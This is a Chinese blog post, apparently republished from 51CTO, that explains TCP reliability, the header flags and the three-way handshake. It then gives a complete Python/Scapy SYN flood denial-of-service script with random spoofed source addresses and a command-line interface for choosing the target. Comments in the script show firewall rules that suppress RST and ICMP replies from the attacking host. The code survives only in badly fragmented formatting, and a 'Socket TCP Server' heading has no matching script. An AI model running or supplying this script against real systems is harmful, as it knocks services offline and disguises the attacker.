面向连接意味着两个使用TCP的应用(通常是一个客户和一个服务器)在彼此交换数据之前必须先建立一个TCP连接。
在一个TCP连接中,仅有两方进行彼此通信。广播和多播不能用于TCP。
TCP通过下列方式来提供可靠性:
应用数据被分割成TCP认为最合适发送的数据块。
当TCP发出一个段后,它启动一个定时器,等待目的端确认收到这个报文段。如果不能及时收到一个确认,将重发这个报文段。
当TCP收到发自TCP连接另一端的数据,它将发送一个确认。这个确认不是立即发送,通常将推迟几分之一秒。
TCP将保持它首部和数据的检验和。
既然TCP报文段作为IP数据报来传输,而IP数据报的到达可能会失序,因此TCP报文段的到达也可能会失序,如果必要,TCP将对收到的数据进行重新排序,将收到的数据以正确的顺序交给应用层。
既然IP数据报会发生重复,TCP的接收端必须丢弃重复的数据。
TCP还能提供流量控制。TCP连接的每一方都有固定大小的缓冲空间。
TCP的接收端只允许另一端发送接收缓冲区所能接纳的数据。这将防止较快主机致使慢主机的缓冲区溢出。
TCP字节流
两个应用程序通过TCP连接交换8bit字节构成的字节流。TCP不在字节流中插入记录标识符。我们将这称为字节流服务(byte stream service)。如果一方的应用程序先传10字节,又传20字节,再传50字节,连接的另一方将无法了解发方每次发送了多少字节。收方可以分4次接收这80个字节,每次接收20字节。一端将字节流放到TCP连接上,同样的字节流将出现在TCP连接的另一端。
另外,TCP对字节流的内容不作任何解释。TCP不知道传输的数据字节流是二进制数据,还是ASCII字符、EBCDIC字符或者其他类型数据。对字节流的解释由TCP连接双方的应用层解释。
每个TCP段都包含源端和目的端的端口号,用于寻找发端和收端应用进程。这两个值加上IP首部中的源端IP地址和目的端IP地址唯一确定一个TCP连接。
一个IP地址和一个端口号也称为一个插口(socket)插口对(socketpair)(包含客户IP地址、客户端口号、服务器IP地址和服务器端口号的四元组)可唯一确定互联网络中每个TCP连接的双方。
序号用来标识从TCP发端向TCP收端发送的数据字节流,它表示在这个报文段中的序号对每个字节进行计数。序号是32bit的无序号数,序号到达2的32次方后又从0开始。SYN标志消耗一个序号。FIN标志也要占用一个序号。
确认序号应当是上次已成功收到数据字节序号加1。只有ACK标志为1时确认序号字段才有效。
发送ACK无需任何代价,因为32bit的确认序号字段和ACK标志一样,总是TCP首部的一部分。因此,我们看到一旦一个连接建立起来,这个字段总是被设置,ACK标志也总是被设置为1。
TCP为应用层提供全双工服务。这意味数据能在两个方向上独立地进行传输。因此,连接的每一端必须保持每个方向上的传输数据序号。
TCP可以表述为一个没有选择确认或否认的滑动窗口协议(滑动窗口协议用于数据传输)。我们说TCP缺少选择确认是因为TCP首部中的确认序号表示发方已成功收到字节,但还不包括确认序号所指的字节。当前还无法对数据流中选定的部分进行确认。例如,如果1-1024字节已经成功收到,下一报文段中包含序号从2049-3072的字节,收端并不能确认这个新的报文段。它所能做的就是发回一个确认序号为1025的ACK。它也无法对一个报文段进行否认。例如,如果收到包含1025-2048字节的报文段,但它的检验和错,TCP接收端所能做的就是发回一个确认序号为1025的ACK。
首部长度给出首部中32bit字段的数目。需要这个值是因为任选字段的长度是可变的。这个字段占4bit,因此TCP最多有60字节的首部。然而,没有任选字段,正常的长度是20字节。
在TCP首部中有6个标志比特。它们中的多个可同时被设置为1。
-
URG 紧急指针有效
-
ACK 确认序号有效
-
PSH 接收方应该尽快将这个报文段交给应用层
-
RST 重建连接
-
SYN 同步序号用来发起一个连接
-
FIN 发端完成发送任务
TCP是一个面向连接的协议。无论哪一方向另一方发送数据之前,都必须先在双方之间建立一条连接。
这种两端间连接的建立与无连接协议如UDP不同。UDP向另一端发送数据报时,无需任何预先的握手。
TCP用三次握手过程创建一个连接。在连接创建过程中,很多参数要被初始化,例如序号被初始化以保证按序传输和连接的强壮性。
一对终端同时初始化一个它们之间的连接是可能的。但通常是由一端打开一个套接字(socket)然后监听来自另一方的连接,这就是通常所指的被动打开。
服务器端被被动打开以后,用户端就能开始创建主动打开。
-
客户端通过向服务器端发送一个SYN来创建一个主动打开,作为三次握手的一部分。客户端把这段连接的序号设定为随机数A。
-
服务器端应当为一个合法的SYN回送一个SYN/ACK。ACK的确认码应为A+1,SYN/ACK包本身又有一个随机序号B。
-
最后,客户端再发送一个ACK。当服务端收到这个ACK的时候,就完成了三次握手,并进入了连接创建状态。此时包序号被设定为收到的确认号A+1,而响应则为B+1。
▼Socket TCP Server脚本样例:
Scapy可以实现的功能:
1、TCP端口扫描
2、防火墙开放端口扫描
3、模拟TCP建立与终止
4、制造TCP DOS攻击
使用随机地址随机端口发起TCP连接
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
|
#!/usr/bin/python3.4
# -*- coding=utf-8 -*-
#firewall-cmd --direct --add-rule ipv4 filter OUTPUT 1 -p tcp --tcp-flags RST RST -s 202.100.1.139 -j DROP
#firewall-cmd --direct --add-rule ipv4 filter OUTPUT 1 -p icmp -s 202.100.1.139 -j DROP
import
logging
logging.getLogger(
"scapy.runtime"
).setLevel(logging.ERROR)
#清除报错
from
scapy.
all
import
*
def
syn_dos(ip, port, random_enable
=
True
):
#定义方法,传入目标IP地址,目标端口号,是否激活随机伪装源IP地址
if
random_enable
=
=
True
:
#如果激活随机伪装源IP地址
while
True
:
#一直执行直到ctl+c停止程序
source_port
=
random.randint(
1024
,
65535
)
#随机产生源端口
init_sn
=
random.randint(
1
,
65535
*
63335
)
#随机产生初始化序列号
yi_section
=
random.randint(
1
,
254
)
#随机产生,第一段IP地址
er_section
=
random.randint(
1
,
254
)
#随机产生,第二段IP地址
san_section
=
random.randint(
1
,
254
)
#随机产生,第三段IP地址
si_section
=
random.randint(
1
,
254
)
#随机产生,第四段IP地址
source_ip
=
str
(yi_section)
+
'.'
+
str
(er_section)
+
'.'
+
str
(san_section)
+
'.'
+
str
(si_section)
#组合四段地址
#发送SYN同步包(不必等待回应)#随机伪装源IP,随机产生源端口和初始化序列号
send(IP(src
=
source_ip,dst
=
ip)
/
TCP(dport
=
port,sport
=
source_port,flags
=
2
,seq
=
init_sn), verbose
=
False
)
else
:
#如果不激活随机伪装源IP地址
while
True
:
source_port
=
random.randint(
1024
,
65535
)
#随机产生源端口
init_sn
=
random.randint(
1
,
65535
*
63335
)
#随机产生初始化序列号
#发送SYN同步包(不必等待回应)#随机产生源端口和初始化序列号
send(IP(dst
=
ip)
/
TCP(dport
=
port,sport
=
source_port,flags
=
2
,seq
=
init_sn), verbose
=
False
)
if
__name__
=
=
'__main__'
:
import
optparse
#导入选项分析模块
#配置帮助
parser
=
optparse.OptionParser(
"程序使用方法介绍: -d <目标地址> -p <目标端口> -r <1:激活(默认) 2:不激活>"
)
#选项‘-d’,指定目的IP地址
parser.add_option(
'-d'
, dest
=
'dst_ip'
,
type
=
'string'
,
help
=
'指定目标地址'
)
#选项‘-p’,指定目的端口号
parser.add_option(
'-p'
, dest
=
'dst_port'
,
type
=
'int'
,
help
=
'指定目标端口'
)
#选项‘-r’,是否激活随机伪装源IP地址
parser.add_option(
'-r'
, dest
=
'random'
,
type
=
'int'
,
help
=
'是否激活随机IP'
)
#分析参数,得到Options
(options, args)
=
parser.parse_args()
#如果没有指定目的IP,或者没有指定目的端口号,显示帮助信息给客户看!
if
(options.dst_ip
=
=
None
)
or
(options.dst_port
=
=
None
):
print
(parser.usage)
exit(
0
)
else
:
#如果客户指定了目的地址和目的端口号,为变量赋值!
destination_ip
=
options.dst_ip
destination_port
=
options.dst_port
if
options.random
=
=
2
:
#如果客户不激活随机伪装源IP地址
syn_dos(destination_ip, destination_port, random_enable
=
False
)
else
:
#客户激活随机伪装源IP地址
syn_dos(destination_ip, destination_port, random_enable
=
True
)
本文转自Grodd51CTO博客,原文链接:http://blog.51cto.com/juispan/1980688,如需转载请自行联系原作者
|
